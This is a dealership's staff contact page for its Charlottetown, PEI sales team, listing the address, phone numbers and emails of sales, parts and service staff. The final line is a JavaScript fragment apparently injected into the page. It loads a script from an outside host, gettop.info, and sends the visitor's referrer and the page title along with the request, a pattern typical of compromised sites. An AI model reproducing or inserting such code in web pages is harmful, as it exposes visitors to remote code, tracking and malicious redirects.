Charlottetown, PEI Sales Team

127 Sherwood Road, Charlottetown, PE C1E 0E5
PHONE: (902) 566-1444
TOLL FREE: (866) 450-1444
FAX: (902) 368-3529

 

Sales

Randal Jewell
Email
randal@hjvequip.com

Cody Corbett
Email
cody@hjvequip.com
                                                                                           
Barry Doyle
Email
barry@hjvequip.com

Parts Manager

Luc Poirier
Email
luc@hjvequip.com

Parts

Charles MacEwen
Email
charles@hjvequip.com

Service Manager

Dennis Macnevin
Email
dennis@hjvequip.com

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;